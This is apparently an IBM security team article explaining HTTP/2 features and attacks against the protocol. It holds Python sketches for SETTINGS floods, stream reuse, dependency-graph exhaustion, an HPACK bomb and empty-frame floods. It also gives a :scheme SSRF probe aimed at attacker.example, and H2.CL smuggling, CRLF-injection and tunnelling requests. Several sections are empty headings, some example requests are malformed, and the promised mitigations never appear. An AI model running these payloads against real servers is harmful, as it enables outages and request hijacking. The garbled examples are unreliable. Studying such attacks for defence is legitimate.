Authors
Pranali Phadtare, Soummya Kulkarni, Shruthi Shunmugom M
About Us
IBM PTC is an internal security test team responsible for vulnerability
assessment and ethical hacking of web applications, mobile applications, and
infrastructure.
Abstract
HTTP has gone through several versions: HTTP/0.9, HTTP/1.0, HTTP/1.1, and
HTTP/2. Each revision improved how requests and responses are exchanged
between client and server, leading up to the latest version.
HTTP/2
In HTTP/1.1, the client sends a request over a TCP connection and then waits
for the response; until this processing is complete at the server side, no new
requests can be sent on that connection. This underutilizes the TCP
connection, which is capable of carrying multiple requests at a time. To load
a complete web page, we might need a lot of supporting files apart from the
main.html page, for example JavaScript files, CSS files, image files, etc.
So, for the web page to load completely over HTTP/1.1, each request must be
sent individually, and the response for each is retrieved one by one.
Obviously, the wait time impacts how quickly the web page loads. To ease this
problem, modern browsers open up to six TCP connections at once when the
server is configured to use HTTP/1.1. The moment a user requests a web page
that needs many supporting files along with the main page, the browser opens
six TCP connections and sends the requests across them. This design is still
slow: if more than six files are needed, there is a wait time again, because
the seventh file can only be requested once one of the six connections becomes
free. It is also expensive, since the extra connections consume more memory.
1. Binary framing layer
This is the most important enhancement made in the HTTP/2 protocol. The
binary framing layer governs how data is encapsulated and transferred between
the client and the server. The HTTP/1.x protocol was a newline-delimited
plaintext protocol, whereas in HTTP/2 the data to be transmitted is split into
messages and frames encoded in binary format.
The full request from the client is first broken down into multiple frames. A
frame can be a header frame, a data (payload) frame, etc., and each frame
carries a stream identifier in its frame header. One or more frames together
form a 'message', which is treated as a logical HTTP message, i.e., a request
or a response consisting of one or more frames. In this way, the data is
transformed and sent over the TCP connection, and when the server returns data
for each of these messages, the client uses the stream identifiers to arrange
the data properly and present it to the end user.
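To make the framing concrete, here is a minimal Python sketch (standard
library only) that packs the 9-byte HTTP/2 frame header defined in RFC 7540: a
24-bit length, an 8-bit type, an 8-bit flags field, and a 31-bit stream
identifier. The type and flag constants come from the specification; the
frame() helper name is ours.

import struct

# Frame type codes from RFC 7540, section 6
DATA, HEADERS = 0x0, 0x1
# Flag bits
END_STREAM, END_HEADERS = 0x1, 0x4

def frame(frame_type, flags, stream_id, payload=b""):
    """Build a raw HTTP/2 frame: 24-bit length, 8-bit type,
    8-bit flags, 1 reserved bit + 31-bit stream identifier."""
    length = len(payload)
    header = struct.pack(">BHBBI",
                         (length >> 16) & 0xFF,    # high byte of 24-bit length
                         length & 0xFFFF,          # low 16 bits of length
                         frame_type,
                         flags,
                         stream_id & 0x7FFFFFFF)   # reserved bit kept at 0
    return header + payload

# A DATA frame carrying part of a request body on stream 1,
# with END_STREAM set to mark the end of the message.
print(frame(DATA, END_STREAM, 1, b"x=123&y=4").hex())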
2. Stream prioritization
HTTP messages are split across various frames, and these frames are
transmitted as streams that are multiplexed over a single connection. Because
many streams and frames are exchanged between the client and the server, their
relative importance needs to be considered. To make this possible, HTTP/2
assigns a weight and a dependency to each stream: every stream is given an
integer weight, and each stream may be declared dependent on another stream.
Based on these weights and dependencies, the client constructs a
prioritization tree describing how it would prefer to receive responses, and
the server uses the same information to prioritize streams when allocating
CPU, memory, and other resources. This feature improves browsing performance
when there are many resources with different dependencies and weights.
Source: https://web-dev.imgix.net/image/C47gYyWYVMMhDmtYSLOWazuyePF2/ydLldhPadjknvvrUiCai.svg
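As a sketch of what the prioritization information looks like on the wire, the
PRIORITY frame payload defined in RFC 7540 section 6.3 carries an exclusive
bit, a 31-bit stream dependency, and a weight encoded as the weight value
minus one; the five payload bytes would be wrapped in a frame header of type
0x2 like the one sketched above. The stream numbers here are illustrative.

import struct

def priority_payload(depends_on, weight, exclusive=False):
    """PRIORITY frame payload (RFC 7540 section 6.3): exclusive bit +
    31-bit stream dependency, followed by weight encoded as weight - 1."""
    dep = (0x80000000 if exclusive else 0) | (depends_on & 0x7FFFFFFF)
    return struct.pack(">IB", dep, weight - 1)

# Stream 5 (e.g. an image) depends on stream 3 (e.g. the CSS) with weight 16.
print(priority_payload(depends_on=3, weight=16).hex())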
3. Flow control
A sender can overwhelm the receiver by transmitting data faster than the
receiver wants or is able to process it. For example, a user starts watching a
video, so the client requests the video data with high priority; when the user
pauses the video, the client wants to pause the delivery of data it no longer
needs instead of buffering it. The flow control mechanism prevents the sender
from overwhelming the receiver with data it does not want or is not able to
process. Because HTTP/2 multiplexes many streams over a single TCP connection,
it allows the client and server to implement flow control at both the stream
level and the connection level. Flow control is directional, with a window
size chosen by the receiver for each stream and for the connection as a whole.
SETTINGS frames exchanged when the HTTP/2 connection is established allow each
side to set the initial size of the flow control window in both directions; no
specific algorithm for implementing flow control is prescribed by HTTP/2. As
an example of this feature, a browser can fetch only a preview of an image,
display it, and reduce that stream's window to zero, allowing high priority
fetches to proceed and resuming the image fetch when the high priority fetches
are complete.
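As a rough illustration of the two frames involved, the sketch below builds a
SETTINGS frame advertising SETTINGS_INITIAL_WINDOW_SIZE (parameter identifier
0x4) on stream 0 and a WINDOW_UPDATE frame (type 0x8) granting additional
credit on stream 1, following the layouts in RFC 7540; the window sizes are
arbitrary example values.

import struct

SETTINGS, WINDOW_UPDATE = 0x4, 0x8           # frame type codes
SETTINGS_INITIAL_WINDOW_SIZE = 0x4           # SETTINGS parameter identifier

# SETTINGS frame on stream 0: advertise a 16 KB initial window for every
# stream the peer opens towards us (2-byte identifier + 4-byte value).
settings_payload = struct.pack(">HI", SETTINGS_INITIAL_WINDOW_SIZE, 16384)
settings_frame = struct.pack(">BHBBI", 0, len(settings_payload),
                             SETTINGS, 0, 0) + settings_payload

# WINDOW_UPDATE on stream 1: grant the peer another 16 KB of credit for
# that stream only (the payload is a single 31-bit increment).
window_update = (struct.pack(">BHBBI", 0, 4, WINDOW_UPDATE, 0, 1)
                 + struct.pack(">I", 16384))

print(settings_frame.hex(), window_update.hex())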
4. Header compression
HTTP/2 compresses headers using HPACK, which maintains a static dictionary of
common headers and a dynamic dictionary built up over the lifetime of the
connection. If a header name:value pair is present in the static dictionary,
the sender simply refers to that encoded entry, which takes barely 1 or 2
bytes. If a new header is encountered, it is added to the dynamic dictionary;
if it was encountered previously, the sender simply refers to the existing
dynamic dictionary entry, which again takes only 1 or 2 bytes, thus
compressing the headers as much as possible.
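A small sketch of this behaviour, assuming the third-party hpack package (the
reference HPACK implementation used alongside hyper-h2): encoding the same
header list twice shows the second block shrinking to a handful of index
references.

from hpack import Encoder, Decoder

encoder, decoder = Encoder(), Decoder()
headers = [(":method", "GET"), (":path", "/index.html"),
           (":authority", "example.com"), ("user-agent", "demo-client")]

first = encoder.encode(headers)    # literals plus dynamic-table insertions
second = encoder.encode(headers)   # mostly one-byte index references
print(len(first), len(second))     # the repeat encoding is far smaller

decoder.decode(first)              # the decoder must see blocks in order
print(decoder.decode(second))      # recovers the original header list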
Server push
It is well known that multiple files are required for a complete web
application to load. For instance, the main.html of a web application needs
several supporting files to be served along with it. Instead of the client
requesting each resource individually, server push gives the server the
capability to return all the files required for the web page to load
completely in response to a single client request, so the client does not have
to request each resource separately.
Source: https://twitter.com/apnic/status/1255699646866997255
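For a rough picture of what a push looks like at the frame level, the
PUSH_PROMISE payload defined in RFC 7540 section 6.6 is a promised stream
identifier followed by the HPACK-encoded request headers of the resource the
server intends to push. The sketch below assumes the third-party hpack
package; the pushed resource is illustrative.

import struct
from hpack import Encoder

promised_stream_id = 2            # server-initiated streams use even numbers
pushed_request = Encoder().encode([
    (":method", "GET"),
    (":path", "/style.css"),      # illustrative pushed resource
    (":authority", "example.com"),
    (":scheme", "https"),
])
# Payload = 31-bit promised stream id + header block fragment, wrapped in a
# frame of type 0x5 (END_HEADERS set) on the stream of the original request.
payload = struct.pack(">I", promised_stream_id & 0x7FFFFFFF) + pushed_request
push_promise = struct.pack(">BHBBI", 0, len(payload), 0x5, 0x4, 1) + payload
print(push_promise.hex())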
With the introduction of HTTP/2, pseudo-headers replaced the request line and
the status line of HTTP/1.x. Pseudo-headers are used to convey information
about the request or response message. There are five pseudo-headers in
HTTP/2, namely :method, :path, :authority, :scheme and :status. These are not
regular HTTP headers, but a replacement for the request and status lines of
HTTP/1.x. The listing below shows the header representation of a sample
HTTP/2 request.
Each of these pseudo-headers serves a different purpose. One of them is the
:scheme header, which represents the scheme of the target URI. It normally
takes values such as http or https, but it can also take arbitrary values; for
example, a :scheme header can carry a full URL. If proper validation is not in
place, this can even lead to redirection and cache poisoning.
Request headers:
:method GET
:path /index.html
:authority 9.199.145.174:8443
Response:
A few web applications use the :scheme value to build the URL to which the
request is routed, creating a potential SSRF vulnerability.
:method POST
:path /index.html
:authority test.com
:scheme https
user-agent burp
x=123&y=4
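Normal browsers and client libraries will not let you tamper with :scheme, so
probing this requires a lower-level client. The rough sketch below assumes the
third-party h2 (hyper-h2) package and that its outbound header validation can
be relaxed through H2Configuration; the hostnames and injected value are
placeholders, not a confirmed exploit.

import socket, ssl
import h2.connection, h2.config

config = h2.config.H2Configuration(client_side=True,
                                   validate_outbound_headers=False)
conn = h2.connection.H2Connection(config=config)

ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.set_alpn_protocols(["h2"])

sock = ctx.wrap_socket(socket.create_connection(("target.example", 443)),
                       server_hostname="target.example")
conn.initiate_connection()
conn.send_headers(1, [
    (":method", "GET"),
    (":path", "/"),
    (":authority", "target.example"),
    # If the back end builds a routing URL from :scheme, this value may
    # cause the request to be routed to an attacker-controlled host (SSRF).
    (":scheme", "https://attacker.example/"),
], end_stream=True)
sock.sendall(conn.data_to_send())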
Some servers do not allow newlines in header names but do allow colons. This
can be abused to carry out desynchronization over HTTP/2 and to supply the
server with multiple hosts. The host of an HTTP/2 request is carried as
:authority <host name>, so we can add one more host header in the following
way: a header whose name is host: test.com and whose value is 443. HTTP/2
treats this as just another header, which can result in host header injection.
:method GET
:path /
:authority example.com
host: test.com443
GET / HTTP/1.1
Host: example.com
Host: test.com:443
:method GET
:path /some-path
:path /different-path
:authority test.com
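Such probes have to be crafted below the usual client APIs. The sketch below,
assuming the third-party hpack package accepts the unusual header name, simply
shows that a header list like this can be encoded at the HTTP/2 layer; the
host names are placeholders.

from hpack import Encoder

# The header name "host: test.com" itself contains a colon and a space.
# HTTP/2 is binary, so HPACK will encode it, but a front end that rewrites
# the request as HTTP/1.1 may emit it as a second Host header line.
block = Encoder().encode([
    (":method", "GET"),
    (":path", "/"),
    (":authority", "example.com"),
    ("host: test.com", "443"),
])
print(block.hex())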
If the front end permits spaces in the :method pseudo-header, request line
injection becomes possible.
<ProxyMatch "/admin">
:path /fakepath
:authority test.com
Host: sample.com
Request-Id: 1234
Poison: x
User-agent: burp
………..
HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 2500
Reset Flooding
Settings Flood:
The SETTINGS frame does not require the receiver to maintain any state other
than the current value of each setting; the value of a SETTINGS parameter is
simply the last value seen by the receiver. A malicious client can abuse this
by streaming an endless sequence of SETTINGS frames, each of which the server
must process and acknowledge, consuming CPU and memory.
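A conceptual sketch of such a flood, using only the standard library: after
the connection preface, the client just keeps streaming empty SETTINGS frames.
The target host and port are placeholders for a cleartext (h2c) test endpoint.

import socket, struct

PREFACE = b"PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n"            # HTTP/2 connection preface
empty_settings = struct.pack(">BHBBI", 0, 0, 0x4, 0, 0)  # SETTINGS, no payload

# Each frame forces the server to process it and queue an acknowledgement.
sock = socket.create_connection(("test-server.local", 8080))  # placeholder
sock.sendall(PREFACE + empty_settings)                         # handshake
for _ in range(100_000):
    sock.sendall(empty_settings)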
When the client wants to request a page from the server, it sends request 1 by
opening a new stream, Stream 1, and assigning it a stream identifier. The
client sends the request over Stream 1 and the server responds on the same
stream. If the client then wants to send another request 2, it is supposed to
open a new stream, Stream 2, for it. In a stream reuse attack, sending request
2 over the already used Stream 1 can lead to Denial of Service on the server.
Research on a vulnerable version of IIS 10 has shown that reusing the same
stream within the same connection led to a Blue Screen of Death.
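A minimal sketch of the kind of probe involved, assuming the third-party hpack
package for header encoding: two complete requests are serialized with the
same stream identifier, so the second one reuses a stream the server already
considers closed. The target host is a placeholder.

import struct
from hpack import Encoder

HEADERS, END_HEADERS, END_STREAM = 0x1, 0x4, 0x1
encoder = Encoder()

def headers_frame(stream_id, hdrs):
    block = encoder.encode(hdrs)
    return struct.pack(">BHBBI", (len(block) >> 16) & 0xFF, len(block) & 0xFFFF,
                       HEADERS, END_HEADERS | END_STREAM, stream_id) + block

request = [(":method", "GET"), (":path", "/"),
           (":authority", "test-server.local"), (":scheme", "https")]

# Two complete requests that both claim stream identifier 1.
probe = headers_frame(1, request) + headers_frame(1, request)
print(probe.hex())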
As described earlier, the HTTP/2 protocol splits HTTP messages into multiple
frames and transmits these frames over streams, so many frames are exchanged
between the client and the server. During this flow, each stream is assigned
an integer weight and a dependency, and a dependency graph is constructed from
them. According to the RFC, this dependency graph should be a tree and must
never contain a cycle, as a cyclic dependency graph can lead to an infinite
loop and eventually crash the server. Apart from this, the size of the graph
is not limited by the protocol, which means each server has to set its own
size limitation. If no limit on the dependency tree is enforced, a malicious
client can create a huge graph that consumes the server's entire memory. A few
servers have shown Denial of Service because these limits were not in place.
One configuration that helps limit the size of the dependency graph is
MAX_CONCURRENT_STREAMS: when the MAX_CONCURRENT_STREAMS limit is reached, the
server cleans up the memory of old streams and assigns it to new streams.
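A conceptual sketch of how such a graph can be inflated with nothing but
PRIORITY frames (RFC 7540 section 6.3), using only the standard library; the
stream counts are arbitrary.

import struct

PRIORITY = 0x2

def priority_frame(stream_id, depends_on, weight=256):
    payload = struct.pack(">IB", depends_on & 0x7FFFFFFF, weight - 1)
    return struct.pack(">BHBBI", 0, len(payload), PRIORITY, 0,
                       stream_id & 0x7FFFFFFF) + payload

# Thousands of idle streams, each depending on the previous one, force the
# server to keep growing its dependency tree; the final frame points the
# first stream back at the last one, forming the cycle the RFC forbids.
frames = b"".join(priority_frame(sid, sid - 2) for sid in range(3, 20001, 2))
frames += priority_frame(1, 19999)
print(len(frames), "bytes of PRIORITY frames")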
DoS on httpd
Consider a connection carrying 15 streams, with each stream assigned its own
memory address on the server.
An HPACK bomb is a kind of DoS attack that takes advantage of the HPACK
algorithm used in HTTP/2. The attacker supplies a header field that is very
large, roughly the same size as the dynamic table, so that once inserted it
occupies the entire table. The attacker then sends header blocks consisting of
repeated references to that entry, each of which the server must expand to the
full field. A small amount of compressed data therefore decompresses into an
enormous amount of data on the server, exhausting its memory.
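A conceptual sketch of the idea, assuming the third-party hpack package
indexes the oversized header as described above; the header name and sizes are
illustrative.

from hpack import Encoder

# One header roughly the size of the default 4 KB dynamic table is encoded
# once as a literal (which inserts it into the table) and then referenced
# repeatedly; every one-byte reference expands to ~4 KB on the receiver.
encoder = Encoder()
bomb = ("x-bomb", "A" * 4000)                # entry small enough to be indexed
block = encoder.encode([bomb] * 4096)        # first literal, the rest indexed
print(len(block), "bytes on the wire")       # a few KB that decode to ~16 MB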
The HTTP/2 protocol is also vulnerable to an empty frames flood. In this
attack, a malicious client sends a large number of empty frames, i.e., frames
with an empty payload and without the end-of-stream flag set; DATA, HEADERS,
and other frame types can be used for the flood. The server keeps processing
these empty frames without ever reaching the end of the stream, consuming
excess CPU, which eventually results in Denial of Service.
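A minimal sketch of what such a flood consists of, using only the standard
library: empty DATA frames on an open stream, none of which carry the
END_STREAM flag.

import struct

# An empty DATA frame on stream 1 with no flags: zero-length payload and no
# END_STREAM, so the receiver keeps processing frames without ever reaching
# the end of the stream.
empty_data = struct.pack(">BHBBI", 0, 0, 0x0, 0, 1)
flood = empty_data * 50_000   # sent after the normal preface/SETTINGS handshake
print(len(flood), "bytes of frames that never finish the stream")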
Slow Read
Data Dribble
Resource Loop
HTTP/2 Downgrading:
Request Smuggling:
The HTTP/2 protocol uses its own built-in length mechanism to identify the end
of an HTTP request, so a dedicated header indicating the content length is not
required on an HTTP/2 connection. But when a downgrade happens, the front-end
server adds a Content-Length header to the request before forwarding it to the
back-end server. A malicious user can inject or manipulate the Content-Length
header so that the back-end server treats the incoming request as two
different requests. An example representation of an H2.CL desync is shown
below.
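The host, path, and smuggled prefix in this sketch are placeholders; an H2.CL
request could look like this:

:method POST
:path /
:authority vulnerable-website.com
content-length 0

GET /admin HTTP/1.1
Host: vulnerable-website.com

The front end forwards the entire HTTP/2 body, but after the downgrade the
back end trusts the attacker-supplied Content-Length of 0, stops reading at
the end of the headers, and treats the leftover bytes as the start of the next
request on the connection.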
Such downgrading can lead to many more Desync attacks like H2.TE
request line injection, H2.TE Header injection, H2.X via request splitting
and so on.
Response queue poisoning:
CRLF:
When a browser sends a request to a web server, the server answers with a
response containing both the HTTP response headers and the actual website
content, i.e., the response body. The headers and the HTML body are separated
by a specific combination of special characters, a carriage return and a line
feed, known for short as CRLF.
Since the headers of an HTTP message and its body are separated by CRLF
characters, an attacker can try to inject a CRLFCRLF sequence, which tells the
server that the headers end and the body begins, as shown below:
Content-Type: text/html
Location: \r\n
<html><h1>hacked!</h1></html>
Content-Type: text/plain
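A rough sketch of how such a payload can be smuggled at the HTTP/2 layer,
assuming the third-party hpack package: HTTP/2 headers are binary, so a header
value may carry raw \r\n bytes that only become line breaks once a front end
rewrites the message as HTTP/1.x. The header name and value are illustrative.

from hpack import Encoder

# The \r\n\r\n inside the value is legal at the HTTP/2 layer; after an
# HTTP/1.1 downgrade it terminates the headers and injects a fake body.
payload = Encoder().encode([
    (":method", "GET"),
    (":path", "/"),
    (":authority", "example.com"),
    ("x-demo", "value\r\n\r\n<html><h1>hacked!</h1></html>"),
])
print(payload.hex())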
Request Tunnelling
Even when we cannot poison the socket to interfere with other users' requests,
we can still send a single request that yields two responses from the back
end. This lets us hide a request and its response from the front end. This
technique for bypassing front-end security measures is called request
tunnelling.
In HTTP/2, each stream should contain a single request and response. If we
receive an HTTP/2 response whose body appears to be an HTTP/1 response, we can
conclude that the second request was successfully tunnelled.
:method POST
:path /comment
:authority vulnerable-website.com
content-type application/x-www-form-urlencoded
foo bar\r\n
Content-Length: 200\r\n
\r\n
comment=
Let us consider this sample request. Initially, both the front end and the
back end agree that it is a single request, but they can be made to disagree
about where the headers end.
Front end – considers everything to be part of the headers and appends its new
internal headers after the comment= string.
Back end – sees the \r\n\r\n sequence, treats it as the end of the headers,
and therefore treats the comment= string along with the internal headers as
part of the body, i.e., as the value of the comment parameter.
Blind request tunnelling is hard to identify, but it can be made non-blind
using the HEAD method: the response to a HEAD request carries a Content-Length
but no body, so the front end reads that many bytes from the back-end
connection and ends up exposing the start of the tunnelled response.
Request
:method HEAD
:path /example
:authority vulnerable-website.com
Response
:status 200
content-type text/html
content-length 131
Conclusion
Any new technology exposes a new surface to the cyber world. Even though
HTTP/2 improved the performance of websites, protocol implementation flaws and
misconfigurations have exposed websites using HTTP/2 to greater security
risks. Applications that were secure earlier have now become insecure in a few
aspects, and a whole new set of vulnerabilities arises when the HTTP/2
protocol is not implemented end-to-end and requests are downgraded. Throughout
this article, we tried to showcase a few of the security vulnerabilities
associated with the HTTP/2 protocol. It is essential for any organization to
be aware of these security loopholes and to take prompt action to prevent
bigger cyber-attacks. Below are a few of the mitigation techniques we would
recommend for those who would like to secure their websites on HTTP/2.